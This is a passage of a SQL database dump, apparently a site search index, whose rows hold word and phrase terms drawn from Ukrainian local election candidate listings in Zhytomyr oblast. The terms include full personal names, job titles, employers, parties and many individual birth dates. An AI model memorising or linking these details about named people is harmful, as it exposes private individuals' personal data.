17.08.1986',0,1,2,'г000',1,'*'),(1626555,'гуцалюк','гуцалюк',0,0,0.4667,'г000',1,'*'),(1626556,'гуцалюк ольга','гуцалюк ольга',0,1,1.4333,'г000',1,'*'),(1626557,'гуцалюк ольга михайлівна','гуцалюк ольга михайлівна',0,1,1.8,'г000',1,'*'),(1626558,'діагностична','діагностична',0,0,0.8,'д000',1,'*'),(1626559,'діагностична поліклініка','діагностична поліклініка',0,1,1.8,'д000',1,'*'),(1626560,'діагностична поліклініка завідуюча','діагностична поліклініка завідуюча',0,1,2,'д000',1,'*'),(1626561,'діброва','діброва',0,0,0.4667,'д000',1,'*'),(1626562,'діброва коростенський','діброва коростенський',0,1,1.7,'д000',1,'*'),(1626563,'діброва коростенський р-н','діброва коростенський р-н',0,1,1.8333,'д000',1,'*'),(1626564,'дільниці','дільниці',0,0,0.5333,'д000',1,'*'),(1626565,'дільниці місце','дільниці місце',0,1,1.4667,'д000',1,'*'),(1626566,'дільниці місце проживання','дільниці місце проживання',0,1,1.8333,'д000',1,'*'),(1626567,'депутатів відсоток','депутатів відсоток',0,1,1.6,'д000',1,'*'),(1626568,'депутатів відсоток відзагального','депутатів відсоток відзагального',0,1,2,'д000',1,'*'),(1626569,'депутатів місцевої','депутатів місцевої',0,1,1.6,'д000',1,'*'),(1626570,'депутатів місцевої ради','депутатів місцевої ради',0,1,1.7667,'д000',1,'*'),(1626571,'депутата голосів','депутата голосів',0,1,1.5333,'д000',1,'*'),(1626572,'депутата голосів за','депутата голосів за',0,1,1.6333,'д000',1,'*'),(1626573,'депутати к-сть','депутати к-сть',0,1,1.4667,'д000',1,'*'),(1626574,'депутати к-сть голосів','депутати к-сть голосів',0,1,1.7333,'д000',1,'*'),(1626575,'депутати кількість','депутати кількість',0,1,1.6,'д000',1,'*'),(1626576,'депутати кількість обраних','депутати кількість обраних',0,1,1.8667,'д000',1,'*'),(1626577,'депутатських мандатів','депутатських мандатів',0,1,1.7,'д000',1,'*'),(1626578,'депутатських мандатів політична','депутатських мандатів політична',0,1,2,'д000',1,'*'),(1626579,'державна','державна',0,0,0.5333,'д000',1,'*'),(1626580,'державна екологічна','державна екологічна',0,1,1.6333,'д000',1,'*'),(1626581,'державна екологічна інспекція','державна екологічна інспекція',0,1,1.9667,'д000',1,'*'),(1626582,'директора','директора',0,0,0.6,'д000',1,'*'),(1626583,'директора місце','директора місце',0,1,1.5,'д000',1,'*'),(1626584,'директора місце проживання','директора місце проживання',0,1,1.8667,'д000',1,'*'),(1626585,'дмитрій','дмитрій',0,0,0.4667,'д000',1,'*'),(1626586,'дмитрій васильович','дмитрій васильович',0,1,1.6,'д000',1,'*'),(1626587,'дмитрій васильович громадянин','дмитрій васильович громадянин',0,1,1.9667,'д000',1,'*'),(1626588,'дмитренко','дмитренко',0,0,0.6,'д000',1,'*'),(1626589,'дмитренко дмитро','дмитренко дмитро',0,1,1.5333,'д000',1,'*'),(1626590,'дмитренко дмитро васильович','дмитренко дмитро васильович',0,1,1.9,'д000',1,'*'),(1626591,'дмитро васильович громадянин','дмитро васильович громадянин',0,1,1.9333,'д000',1,'*'),(1626592,'дп лісгосп','дп лісгосп',0,1,1.3333,'д000',1,'*'),(1626593,'дп лісгосп апк','дп лісгосп апк',0,1,1.4667,'д000',1,'*'),(1626594,'дробарно-сортувальної','дробарно-сортувальної',0,0,1,'д000',1,'*'),(1626595,'дробарно-сортувальної дільниці','дробарно-сортувальної дільниці',0,1,2,'д000',1,'*'),(1626596,'дробарно-сортувальної дільниці місце','дробарно-сортувальної дільниці місце',0,1,2,'д000',1,'*'),(1626597,'дружня','дружня',0,0,0.4,'д000',1,'*'),(1626598,'дружня оселя','дружня оселя',0,1,1.4,'д000',1,'*'),(1626599,'дружня оселя голова','дружня оселя голова',0,1,1.6333,'д000',1,'*'),(1626600,'екогран','екогран',0,0,0.4667,'е000',1,'*'),(1626601,'екогран головний','екогран головний',0,1,1.5333,'е000',1,'*'),(1626602,'екогран головний енергетик','екогран головний енергетик',0,1,1.8667,'е000',1,'*'),(1626603,'екологічна','екологічна',0,0,0.6667,'е000',1,'*'),(1626604,'екологічна інспекція','екологічна інспекція',0,1,1.6667,'е000',1,'*'),(1626605,'екологічна інспекція поліського','екологічна інспекція поліського',0,1,2,'е000',1,'*'),(1626606,'екоресурс','екоресурс',0,0,0.6,'е000',1,'*'),(1626607,'екоресурс директор','екоресурс директор',0,1,1.6,'е000',1,'*'),(1626608,'екоресурс директор місце','екоресурс директор місце',0,1,1.8,'е000',1,'*'),(1626609,'енергетик','енергетик',0,0,0.6,'е000',1,'*'),(1626610,'енергетик місце','енергетик місце',0,1,1.5,'е000',1,'*'),(1626611,'енергетик місце проживання','енергетик місце проживання',0,1,1.8667,'е000',1,'*'),(1626612,'енергоінвест','енергоінвест',0,0,0.8,'е000',1,'*'),(1626613,'енергоінвест оператор','енергоінвест оператор',0,1,1.7,'е000',1,'*'),(1626614,'енергоінвест оператор насосної','енергоінвест оператор насосної',0,1,2,'е000',1,'*'),(1626615,'житлово-комунальне','житлово-комунальне',0,0,1,'ж000',1,'*'),(1626616,'житлово-комунальне господарство','житлово-комунальне господарство',0,1,2,'ж000',1,'*'),(1626617,'житлово-комунальне господарство інспектор','житлово-комунальне господарство інспектор',0,1,2,'ж000',1,'*'),(1626618,'житомир житомирська','житомир житомирська',0,1,1.6333,'ж000',1,'*'),(1626619,'житомир житомирська обл','житомир житомирська обл',0,1,1.7667,'ж000',1,'*'),(1626620,'житомиробленерго','житомиробленерго',0,0,1,'ж000',1,'*'),(1626621,'житомиробленерго юрист','житомиробленерго юрист',0,1,1.7333,'ж000',1,'*'),(1626622,'житомиробленерго юрист місце','житомиробленерго юрист місце',0,1,1.9333,'ж000',1,'*'),(1626623,'житомирська обл 100','житомирська обл 100',0,1,1.6333,'ж000',1,'*'),(1626624,'житомирська обл 106','житомирська обл 106',0,1,1.6333,'ж000',1,'*'),(1626625,'житомирська обл 111','житомирська обл 111',0,1,1.6333,'ж000',1,'*'),(1626626,'житомирська обл 123','житомирська обл 123',0,1,1.6333,'ж000',1,'*'),(1626627,'житомирська обл 132','житомирська обл 132',0,1,1.6333,'ж000',1,'*'),(1626628,'житомирська обл 163','житомирська обл 163',0,1,1.6333,'ж000',1,'*'),(1626629,'житомирська обл 164','житомирська обл 164',0,1,1.6333,'ж000',1,'*'),(1626630,'житомирська обл 20','житомирська обл 20',0,1,1.6,'ж000',1,'*'),(1626631,'житомирська обл 201','житомирська обл 201',0,1,1.6333,'ж000',1,'*'),(1626632,'житомирська обл 207','житомирська обл 207',0,1,1.6333,'ж000',1,'*'),(1626633,'житомирська обл 215','житомирська обл 215',0,1,1.6333,'ж000',1,'*'),(1626634,'житомирська обл 217','житомирська обл 217',0,1,1.6333,'ж000',1,'*'),(1626635,'житомирська обл 233','житомирська обл 233',0,1,1.6333,'ж000',1,'*'),(1626636,'житомирська обл 237','житомирська обл 237',0,1,1.6333,'ж000',1,'*'),(1626637,'житомирська обл 26','житомирська обл 26',0,1,1.6,'ж000',1,'*'),(1626638,'житомирська обл 33','житомирська обл 33',0,1,1.6,'ж000',1,'*'),(1626639,'житомирська обл 37','житомирська обл 37',0,1,1.6,'ж000',1,'*'),(1626640,'житомирська обл 39','житомирська обл 39',0,1,1.6,'ж000',1,'*'),(1626641,'житомирська обл 46','житомирська обл 46',0,1,1.6,'ж000',1,'*'),(1626642,'житомирська обл 48','житомирська обл 48',0,1,1.6,'ж000',1,'*'),(1626643,'житомирська обл 527','житомирська обл 527',0,1,1.6333,'ж000',1,'*'),(1626644,'житомирська обл 59','житомирська обл 59',0,1,1.6,'ж000',1,'*'),(1626645,'житомирська обл 61','житомирська обл 61',0,1,1.6,'ж000',1,'*'),(1626646,'житомирська обл 67','житомирська обл 67',0,1,1.6,'ж000',1,'*'),(1626647,'житомирська обл 97','житомирська обл 97',0,1,1.6,'ж000',1,'*'),(1626648,'житомирська обл єбво','житомирська обл єбво',0,1,1.6667,'ж000',1,'*'),(1626649,'життя 376','життя 376',0,1,1.3,'ж000',1,'*'),(1626650,'життя 376 0','життя 376 0',0,1,1.3667,'ж000',1,'*'),(1626651,'з благоустрою','з благоустрою',0,1,1.4333,'з000',1,'*'),(1626652,'з благоустрою місце','з благоустрою місце',0,1,1.6333,'з000',1,'*'),(1626653,'з гірничого','з гірничого',0,1,1.3667,'з000',1,'*'),(1626654,'з гірничого цеху','з гірничого цеху',0,1,1.5333,'з000',1,'*'),(1626655,'з онпс','з онпс',0,1,1.2,'з000',1,'*'),(1626656,'з онпс місце','з онпс місце',0,1,1.4,'з000',1,'*'),(1626657,'з технічної','з технічної',0,1,1.3667,'з000',1,'*'),(1626658,'з технічної інвентаризації','з технічної інвентаризації',0,1,1.8667,'з000',1,'*'),(1626659,'за від','за від',0,1,1.2,'з000',1,'*'),(1626660,'за від квоти','за від квоти',0,1,1.4,'з000',1,'*'),(1626661,'за життя','за життя',0,1,1.2667,'з000',1,'*'),(1626662,'за життя 376','за життя 376',0,1,1.4,'з000',1,'*'),(1626663,'за місцеву','за місцеву',0,1,1.3333,'з000',1,'*'),(1626664,'за місцеву організацію','за місцеву організацію',0,1,1.7333,'з000',1,'*'),(1626665,'за майбутнє','за майбутнє',0,1,1.3667,'з000',1,'*'),(1626666,'за майбутнє 329','за майбутнє 329',0,1,1.5,'з000',1,'*'),(1626667,'за яким','за яким',0,1,1.2333,'з000',1,'*'),(1626668,'за яким закріплено','за яким закріплено',0,1,1.6,'з000',1,'*'),(1626669,'забране','забране',0,0,0.4667,'з000',1,'*'),(1626670,'забране коростенський','забране коростенський',0,1,1.7,'з000',1,'*'),(1626671,'забране коростенський р-н','забране коростенський р-н',0,1,1.8333,'з000',1,'*'),(1626672,'завідуюча складами','завідуюча складами',0,1,1.6,'з000',1,'*'),(1626673,'завідуюча складами місце','завідуюча складами місце',0,1,1.8,'з000',1,'*'),(1626674,'загальні','загальні',0,0,0.5333,'з000',1,'*'),(1626675,'загальні відомості','загальні відомості',0,1,1.6,'з000',1,'*'),(1626676,'загальні відомості про','загальні відомості про',0,1,1.7333,'з000',1,'*'),(1626677,'закріплено','закріплено',0,0,0.6667,'з000',1,'*'),(1626678,'закріплено прізвище','закріплено прізвище',0,1,1.6333,'з000',1,'*'),(1626679,'закріплено прізвище ім\'я','закріплено прізвище ім',0,1,1.8,'з000',1,'*'),(1626680,'заступник','заступник',0,0,0.6,'з000',1,'*'),(1626681,'заступник генерального','заступник генерального',0,1,1.7333,'з000',1,'*'),(1626682,'заступник генерального директора','заступник генерального директора',0,1,2,'з000',1,'*'),(1626683,'заступник директора','заступник директора',0,1,1.6333,'з000',1,'*'),(1626684,'заступник директора місце','заступник директора місце',0,1,1.8333,'з000',1,'*'),(1626685,'заступник міського','заступник міського',0,1,1.6,'з000',1,'*'),(1626686,'заступник міського голови','заступник міського голови',0,1,1.8333,'з000',1,'*'),(1626687,'заступник начальника','заступник начальника',0,1,1.6667,'з000',1,'*'),(1626688,'заступник начальника з','заступник начальника з',0,1,1.7333,'з000',1,'*'),(1626689,'к-сть','к-сть',0,0,0.3333,'к000',1,'*'),(1626690,'к-сть голосів','к-сть голосів',0,1,1.4333,'к000',1,'*'),(1626691,'к-сть голосів поданих','к-сть голосів поданих',0,1,1.7,'к000',1,'*'),(1626692,'к-сть отриманих','к-сть отриманих',0,1,1.5,'к000',1,'*'),(1626693,'к-сть отриманих депутатських','к-сть отриманих депутатських',0,1,1.9333,'к000',1,'*'),(1626694,'кількість депутатів','кількість депутатів',0,1,1.6333,'к000',1,'*'),(1626695,'кількість депутатів місцевої','кількість депутатів місцевої',0,1,1.9333,'к000',1,'*'),(1626696,'кандидат дмитренко','кандидат дмитренко',0,1,1.6,'к000',1,'*'),(1626697,'кандидат дмитренко дмитро','кандидат дмитренко дмитро',0,1,1.8333,'к000',1,'*'),(1626698,'кандидат насіканова','кандидат насіканова',0,1,1.6333,'к000',1,'*'),(1626699,'кандидат насіканова марія','кандидат насіканова марія',0,1,1.8333,'к000',1,'*'),(1626700,'кандидат парфіненко','кандидат парфіненко',0,1,1.6333,'к000',1,'*'),(1626701,'кандидат парфіненко наталія','кандидат парфіненко наталія',0,1,1.9,'к000',1,'*'),(1626702,'кандидат рудченко','кандидат рудченко',0,1,1.5667,'к000',1,'*'),(1626703,'кандидат рудченко юрій','кандидат рудченко юрій',0,1,1.7333,'к000',1,'*'),(1626704,'кандидат шостак','кандидат шостак',0,1,1.5,'к000',1,'*'),(1626705,'кандидат шостак олексій','кандидат шостак олексій',0,1,1.7667,'к000',1,'*'),(1626706,'кар\'єр','кар',0,0,0.4,'к000',1,'*'),(1626707,'кар\'єр заступник','кар заступник',0,1,1.5333,'к000',1,'*'),(1626708,'кар\'єр заступник начальника','кар заступник начальника',0,1,1.9,'к000',1,'*'),(1626709,'карпенко сергій','карпенко сергій',0,1,1.5,'к000',1,'*'),(1626710,'карпенко сергій васильович','карпенко сергій васильович',0,1,1.8667,'к000',1,'*'),(1626711,'кашиця','кашиця',0,0,0.4,'к000',1,'*'),(1626712,'кашиця в\'ячеслав','кашиця в',0,1,1.5333,'к000',1,'*'),(1626713,'кашиця в\'ячеслав михайлович','кашиця в михайлович',0,1,1.9,'к000',1,'*'),(1626714,'квоти','квоти',0,0,0.3333,'к000',1,'*'),(1626715,'квоти виборчий','квоти виборчий',0,1,1.4667,'к000',1,'*'),(1626716,'квоти виборчий округ','квоти виборчий округ',0,1,1.6667,'к000',1,'*'),(1626717,'керуючий','керуючий',0,0,0.5333,'к000',1,'*'),(1626718,'керуючий справами','керуючий справами',0,1,1.5667,'к000',1,'*'),(1626719,'керуючий справами місце','керуючий справами місце',0,1,1.7667,'к000',1,'*'),(1626720,'кисельчук','кисельчук',0,0,0.6,'к000',1,'*'),(1626721,'кисельчук дмитрій','кисельчук дмитрій',0,1,1.5667,'к000',1,'*'),(1626722,'кисельчук дмитрій васильович','кисельчук дмитрій васильович',0,1,1.9333,'к000',1,'*'),(1626723,'комітет','комітет',0,0,0.4667,'к000',1,'*'),(1626724,'комітет малинської','комітет малинської',0,1,1.6,'к000',1,'*'),(1626725,'комітет малинської міської','комітет малинської міської',0,1,1.8667,'к000',1,'*'),(1626726,'компанія','компанія',0,0,0.5333,'к000',2,'*'),(1626727,'компанія юнігран','компанія юнігран',0,1,1.5333,'к000',1,'*'),(1626728,'компанія юнігран завідуюча','компанія юнігран завідуюча',0,1,1.8667,'к000',1,'*'),(1626729,'комунальне','комунальне',0,0,0.6667,'к000',1,'*'),(1626730,'комунальне підприємство','комунальне підприємство',0,1,1.7667,'к000',1,'*'),(1626731,'комунальне підприємство з','комунальне підприємство з',0,1,1.8333,'к000',1,'*'),(1626732,'консультативно','консультативно',0,0,0.9333,'к000',1,'*'),(1626733,'консультативно діагностична','консультативно діагностична',0,1,1.9,'к000',1,'*'),(1626734,'консультативно діагностична поліклініка','консультативно діагностична поліклініка',0,1,2,'к000',1,'*'),(1626735,'коростенський','коростенський',0,0,0.8667,'к000',1,'*'),(1626736,'коростенський кар\'єр','коростенський кар',0,1,1.6667,'к000',1,'*'),(1626737,'коростенський кар\'єр заступник','коростенський кар заступник',0,1,2,'к000',1,'*'),(1626738,'коростенський р-н','коростенський р-н',0,1,1.5667,'к000',1,'*'),(1626739,'коростенський р-н житомирська','коростенський р-н житомирська',0,1,1.9667,'к000',1,'*'),(1626740,'коростенський р-н малинська','коростенський р-н малинська',0,1,1.9,'к000',1,'*'),(1626741,'коростенськийр-н','коростенськийр-н',0,0,1,'к000',1,'*'),(1626742,'коростенськийр-н житомирська','коростенськийр-н житомирська',0,1,1.9333,'к000',1,'*'),(1626743,'коростенськийр-н житомирська обл','коростенськийр-н житомирська обл',0,1,2,'к000',1,'*'),(1626744,'коростень','коростень',0,0,0.6,'к000',1,'*'),(1626745,'коростень коростенський','коростень коростенський',0,1,1.7667,'к000',1,'*'),(1626746,'коростень коростенський р-н','коростень коростенський р-н',0,1,1.9,'к000',1,'*'),(1626747,'костюченко','костюченко',0,0,0.6667,'к000',1,'*'),(1626748,'костюченко лариса','костюченко лариса',0,1,1.5667,'к000',1,'*'),(1626749,'костюченко лариса миколаївна','костюченко лариса миколаївна',0,1,1.9333,'к000',1,'*'),(1626750,'кп','кп',0,0,0.1333,'к000',1,'*'),(1626751,'кп екоресурс','кп екоресурс',0,1,1.4,'к000',1,'*'),(1626752,'кп екоресурс директор','кп екоресурс директор',0,1,1.7,'к000',1,'*'),(1626753,'край 16 47.06','край 16 47.06',0,1,1.4333,'к000',1,'*'),(1626754,'край 4472','край 4472',0,1,1.3,'к000',1,'*'),(1626755,'край 4472 16','край 4472 16',0,1,1.4,'к000',1,'*'),(1626756,'край малинське','край малинське',0,1,1.4667,'к000',1,'*'),(1626757,'край малинське районне','край малинське районне',0,1,1.7333,'к000',1,'*'),(1626758,'край перший','край перший',0,1,1.3667,'к000',1,'*'),(1626759,'край перший кандидат','край перший кандидат',0,1,1.6667,'к000',1,'*'),(1626760,'край тов','край тов',0,1,1.2667,'к000',1,'*'),(1626761,'край тов тандем','край тов тандем',0,1,1.5,'к000',1,'*'),(1626762,'край тов юнігран','край тов юнігран',0,1,1.5333,'к000',1,'*'),(1626763,'ліва','ліва',0,0,0.2667,'л000',1,'*'),(1626764,'ліва опозиція','ліва опозиція',0,1,1.4333,'л000',1,'*'),(1626765,'ліва опозиція 102','ліва опозиція 102',0,1,1.5667,'л000',1,'*'),(1626766,'ліпей','ліпей',0,0,0.3333,'л000',1,'*'),(1626767,'ліпей надія','ліпей надія',0,1,1.3667,'л000',1,'*'),(1626768,'ліпей надія володимирівна','ліпей надія володимирівна',0,1,1.8333,'л000',1,'*'),(1626769,'лісгосп','лісгосп',0,0,0.4667,'л000',1,'*'),(1626770,'лісгосп апк','лісгосп апк',0,1,1.3667,'л000',1,'*'),(1626771,'лісгосп апк директор','лісгосп апк директор',0,1,1.6667,'л000',1,'*'),(1626772,'лісовський','лісовський',0,0,0.6667,'л000',1,'*'),(1626773,'лісовський юрій','лісовський юрій',0,1,1.5,'л000',1,'*'),(1626774,'лісовський юрій володимирович','лісовський юрій володимирович',0,1,1.9667,'л000',1,'*'),(1626775,'ліцей','ліцей',0,0,0.3333,'л000',1,'*'),(1626776,'ліцей заступник','ліцей заступник',0,1,1.5,'л000',1,'*'),(1626777,'ліцей заступник директора','ліцей заступник директора',0,1,1.8333,'л000',1,'*'),(1626778,'лазарчук','лазарчук',0,0,0.5333,'л000',1,'*'),(1626779,'лазарчук людмила','лазарчук людмила',0,1,1.5333,'л000',1,'*'),(1626780,'лазарчук людмила анатоліївна','лазарчук людмила анатоліївна',0,1,1.9333,'л000',1,'*'),(1626781,'лариса миколаївна громадянка','лариса миколаївна громадянка',0,1,1.9333,'л000',1,'*'),(1626782,'леонідович','леонідович',0,0,0.6667,'л000',1,'*'),(1626783,'леонідович громадянин','леонідович громадянин',0,1,1.7,'л000',1,'*'),(1626784,'леонідович громадянин україни','леонідович громадянин україни',0,1,1.9667,'л000',1,'*'),(1626785,'леся','леся',0,0,0.2667,'л000',1,'*'),(1626786,'леся андріївна','леся андріївна',0,1,1.4667,'л000',1,'*'),(1626787,'леся андріївна громадянка','леся андріївна громадянка',0,1,1.8333,'л000',1,'*'),(1626788,'лукашенко','лукашенко',0,0,0.6,'л000',1,'*'),(1626789,'лукашенко віталій','лукашенко віталій',0,1,1.5667,'л000',1,'*'),(1626790,'лукашенко віталій анатолійович','лукашенко віталій анатолійович',0,1,2,'л000',1,'*'),(1626791,'любовицька','любовицька',0,0,0.6667,'л000',1,'*'),(1626792,'любовицька сільська','любовицька сільська',0,1,1.6333,'л000',1,'*'),(1626793,'любовицька сільська рада','любовицька сільська рада',0,1,1.8,'л000',1,'*'),(1626794,'любовичі','любовичі',0,0,0.5333,'л000',1,'*'),(1626795,'любовичі коростенськийр-н','любовичі коростенськийр-н',0,1,1.8333,'л000',1,'*'),(1626796,'любовичі коростенськийр-н житомирська','любовичі коростенськийр-н житомирська',0,1,2,'л000',1,'*'),(1626797,'людмила анатоліївна','людмила анатоліївна',0,1,1.6333,'л000',1,'*'),(1626798,'людмила анатоліївна громадянка','людмила анатоліївна громадянка',0,1,2,'л000',1,'*'),(1626799,'ляшка','ляшка',0,0,0.3333,'л000',1,'*'),(1626800,'ляшка 190','ляшка 190',0,1,1.3,'л000',1,'*'),(1626801,'ляшка 190 0','ляшка 190 0',0,1,1.3667,'л000',1,'*'),(1626802,'м житомир','м житомир',0,1,1.3,'м000',1,'*'),(1626803,'м житомир житомирська','м житомир житомирська',0,1,1.7,'м000',1,'*'),(1626804,'м коростень','м коростень',0,1,1.3667,'м000',1,'*'),(1626805,'м коростень коростенський','м коростень коростенський',0,1,1.8333,'м000',1,'*'),(1626806,'м малин коростенський','м малин коростенський',0,1,1.7,'м000',1,'*'),(1626807,'місце проживання смт','місце проживання смт',0,1,1.6667,'м000',1,'*'),(1626808,'місцевої','місцевої',0,0,0.5333,'м000',1,'*'),(1626809,'місцевої ради','місцевої ради',0,1,1.4333,'м000',1,'*'),(1626810,'місцевої ради 34','місцевої ради 34',0,1,1.5333,'м000',1,'*'),(1626811,'місцевої ради назва','місцевої ради назва',0,1,1.6333,'м000',1,'*'),(1626812,'місцевої ради які','місцевої ради які',0,1,1.5667,'м000',1,'*'),(1626813,'місцеву','місцеву',0,0,0.4667,'м000',1,'*'),(1626814,'місцеву організацію','місцеву організацію',0,1,1.6333,'м000',1,'*'),(1626815,'місцеву організацію політичної','місцеву організацію політичної',0,1,2,'м000',1,'*'),(1626816,'міська рада кількість','міська рада кількість',0,1,1.7,'м000',1,'*'),(1626817,'міський голова','міський голова',0,1,1.4667,'м000',1,'*'),(1626818,'міський голова місце','міський голова місце',0,1,1.6667,'м000',1,'*'),(1626819,'міської ради заступник','міської ради заступник',0,1,1.7333,'м000',1,'*'),(1626820,'міської ради міський','міської ради міський',0,1,1.6667,'м000',1,'*'),(1626821,'міського','міського',0,0,0.5333,'м000',1,'*'),(1626822,'міського голови','міського голови',0,1,1.5,'м000',1,'*'),(1626823,'міського голови місце','міського голови місце',0,1,1.7,'м000',1,'*'),(1626824,'майбутнє','майбутнє',0,0,0.5333,'м000',1,'*'),(1626825,'майбутнє 329','майбутнє 329',0,1,1.4,'м000',1,'*'),(1626826,'майбутнє 329 0','майбутнє 329 0',0,1,1.4667,'м000',1,'*'),(1626827,'майстренко василь','майстренко василь',0,1,1.5667,'м000',1,'*'),(1626828,'майстренко василь петрович','майстренко василь петрович',0,1,1.8667,'м000',1,'*'),(1626829,'малин енергоінвест','малин енергоінвест',0,1,1.6,'м000',1,'*'),(1626830,'малин енергоінвест оператор','малин енергоінвест оператор',0,1,1.9,'м000',1,'*'),(1626831,'малин коростенський','малин коростенський',0,1,1.6333,'м000',1,'*'),(1626832,'малин коростенський р-н','малин коростенський р-н',0,1,1.7667,'м000',1,'*'),(1626833,'малинівська','малинівська',0,0,0.7333,'м000',1,'*'),(1626834,'малинівська сільська','малинівська сільська',0,1,1.6667,'м000',1,'*'),(1626835,'малинівська сільська рада','малинівська сільська рада',0,1,1.8333,'м000',1,'*'),(1626836,'малинська райрада','малинська райрада',0,1,1.5667,'м000',1,'*'),(1626837,'малинська райрада керуючий','малинська райрада керуючий',0,1,1.8667,'м000',1,'*'),(1626838,'малинське','малинське',0,0,0.6,'м000',1,'*'),(1626839,'малинське районне','малинське районне',0,1,1.5667,'м000',1,'*'),(1626840,'малинське районне комунальне','малинське районне комунальне',0,1,1.9333,'м000',1,'*'),(1626841,'малинський професійно','малинський професійно',0,1,1.7,'м000',1,'*'),(1626842,'малинський професійно технічний','малинський професійно технічний',0,1,2,'м000',1,'*'),(1626843,'малинського дп','малинського дп',0,1,1.4667,'м000',1,'*'),(1626844,'малинського дп лісгосп','малинського дп лісгосп',0,1,1.7333,'м000',1,'*'),(1626845,'малинського правління','малинського правління',0,1,1.7,'м000',1,'*'),(1626846,'малинського правління осбб','малинського правління осбб',0,1,1.8667,'м000',1,'*'),(1626847,'малинського району сільський','малинського району сільський',0,1,1.9333,'м000',1,'*'),(1626848,'мандатів','мандатів',0,0,0.5333,'м000',1,'*'),(1626849,'мандатів політична','мандатів політична',0,1,1.6,'м000',1,'*'),(1626850,'мандатів політична партія','мандатів політична партія',0,1,1.8333,'м000',1,'*'),(1626851,'марія іванівна','марія іванівна',0,1,1.4667,'м000',1,'*'),(1626852,'марія іванівна громадянка','марія іванівна громадянка',0,1,1.8333,'м000',1,'*'),(1626853,'марія миколаївна громадянка','марія миколаївна громадянка',0,1,1.9,'м000',1,'*'),(1626854,'микола іванович','микола іванович',0,1,1.5,'м000',1,'*'),(1626855,'микола іванович громадянин','микола іванович громадянин',0,1,1.8667,'м000',1,'*'),(1626856,'миколаївна громадянка','миколаївна громадянка',0,1,1.7,'м000',1,'*'),(1626857,'миколаївна громадянка україни','миколаївна громадянка україни',0,1,1.9667,'м000',1,'*'),(1626858,'миколайович громадянин','миколайович громадянин',0,1,1.7333,'м000',1,'*'),(1626859,'миколайович громадянин україни','миколайович громадянин україни',0,1,2,'м000',1,'*'),(1626860,'михайлівна','михайлівна',0,0,0.6667,'м000',1,'*'),(1626861,'михайлівна громадянка','михайлівна громадянка',0,1,1.7,'м000',1,'*'),(1626862,'михайлівна громадянка україни','михайлівна громадянка україни',0,1,1.9667,'м000',1,'*'),(1626863,'михайлович','михайлович',0,0,0.6667,'м000',1,'*'),(1626864,'михайлович громадянин','михайлович громадянин',0,1,1.7,'м000',1,'*'),(1626865,'михайлович громадянин україни','михайлович громадянин україни',0,1,1.9667,'м000',1,'*'),(1626866,'на відповідних','на відповідних',0,1,1.4667,'н000',1,'*'),(1626867,'на відповідних виборах','на відповідних виборах',0,1,1.7333,'н000',1,'*'),(1626868,'надії','надії',0,0,0.3333,'н000',2,'*'),(1626869,'надії савченко','надії савченко',0,1,1.4667,'н000',1,'*'),(1626870,'надії савченко 94','надії савченко 94',0,1,1.5667,'н000',1,'*'),(1626871,'надія володимирівна','надія володимирівна',0,1,1.6333,'н000',1,'*'),(1626872,'надія володимирівна громадянка','надія володимирівна громадянка',0,1,2,'н000',1,'*'),(1626873,'народився 01.02.1970','народився 01.02.1970',0,1,1.6667,'н000',1,'*'),(1626874,'народився 01.02.1970 р','народився 01.02.1970 р',0,1,1.7333,'н000',1,'*'),(1626875,'народився 04.05.1981','народився 04.05.1981',0,1,1.6667,'н000',1,'*'),(1626876,'народився 04.05.1981 р','народився 04.05.1981 р',0,1,1.7333,'н000',1,'*'),(1626877,'народився 05.04.1976','народився 05.04.1976',0,1,1.6667,'н000',1,'*'),(1626878,'народився 05.04.1976 р','народився 05.04.1976 р',0,1,1.7333,'н000',1,'*'),(1626879,'народився 05.05.1992','народився 05.05.1992',0,1,1.6667,'н000',1,'*'),(1626880,'народився 05.05.1992 р','народився 05.05.1992 р',0,1,1.7333,'н000',1,'*'),(1626881,'народився 06.01.1982','народився 06.01.1982',0,1,1.6667,'н000',1,'*'),(1626882,'народився 06.01.1982 р','народився 06.01.1982 р',0,1,1.7333,'н000',1,'*'),(1626883,'народився 09.08.1981','народився 09.08.1981',0,1,1.6667,'н000',1,'*'),(1626884,'народився 09.08.1981 р','народився 09.08.1981 р',0,1,1.7333,'н000',1,'*'),(1626885,'народився 11.05.1991','народився 11.05.1991',0,1,1.6667,'н000',1,'*'),(1626886,'народився 11.05.1991 р','народився 11.05.1991 р',0,1,1.7333,'н000',1,'*'),(1626887,'народився 14.08.1976','народився 14.08.1976',0,1,1.6667,'н000',1,'*'),(1626888,'народився 14.08.1976 р','народився 14.08.1976 р',0,1,1.7333,'н000',1,'*'),(1626889,'народився 14.12.1967','народився 14.12.1967',0,1,1.6667,'н000',1,'*'),(1626890,'народився 14.12.1967 р','народився 14.12.1967 р',0,1,1.7333,'н000',1,'*'),(1626891,'народився 16.04.1969','народився 16.04.1969',0,1,1.6667,'н000',1,'*'),(1626892,'народився 16.04.1969 р','народився 16.04.1969 р',0,1,1.7333,'н000',1,'*'),(1626893,'народився 17.07.1979','народився 17.07.1979',0,1,1.6667,'н000',1,'*'),(1626894,'народився 17.07.1979 р','народився 17.07.1979 р',0,1,1.7333,'н000',1,'*'),(1626895,'народився 17.08.1986','народився 17.08.1986',0,1,1.6667,'н000',1,'*'),(1626896,'народився 17.08.1986 р','народився 17.08.1986 р',0,1,1.7333,'н000',1,'*'),(1626897,'народився 19.10.1966','народився 19.10.1966',0,1,1.6667,'н000',1,'*'),(1626898,'народився 19.10.1966 р','народився 19.10.1966 р',0,1,1.7333,'н000',1,'*'),(1626899,'народився 21.07.1982','народився 21.07.1982',0,1,1.6667,'н000',1,'*'),(1626900,'народився 21.07.1982 р','народився 21.07.1982 р',0,1,1.7333,'н000',1,'*'),(1626901,'народився 21.10.1972','народився 21.10.1972',0,1,1.6667,'н000',1,'*'),(1626902,'народився 21.10.1972 р','народився 21.10.1972 р',0,1,1.7333,'н000',1,'*'),(1626903,'народився 23.11.1962','народився 23.11.1962',0,1,1.6667,'н000',1,'*'),(1626904,'народився 23.11.1962 р','народився 23.11.1962 р',0,1,1.7333,'н000',1,'*'),(1626905,'народився 28.01.1977','народився 28.01.1977',0,1,1.6667,'н000',1,'*'),(1626906,'народився 28.01.1977 р','народився 28.01.1977 р',0,1,1.7333,'н000',1,'*'),(1626907,'народився 28.08.1962','народився 28.08.1962',0,1,1.6667,'н000',1,'*'),(1626908,'народився 28.08.1962 р','народився 28.08.1962 р',0,1,1.7333,'н000',1,'*'),(1626909,'народився 28.12.1974','народився 28.12.1974',0,1,1.6667,'н000',1,'*'),(1626910,'народився 28.12.1974 р','народився 28.12.1974 р',0,1,1.7333,'н000',1,'*'),(1626911,'народився 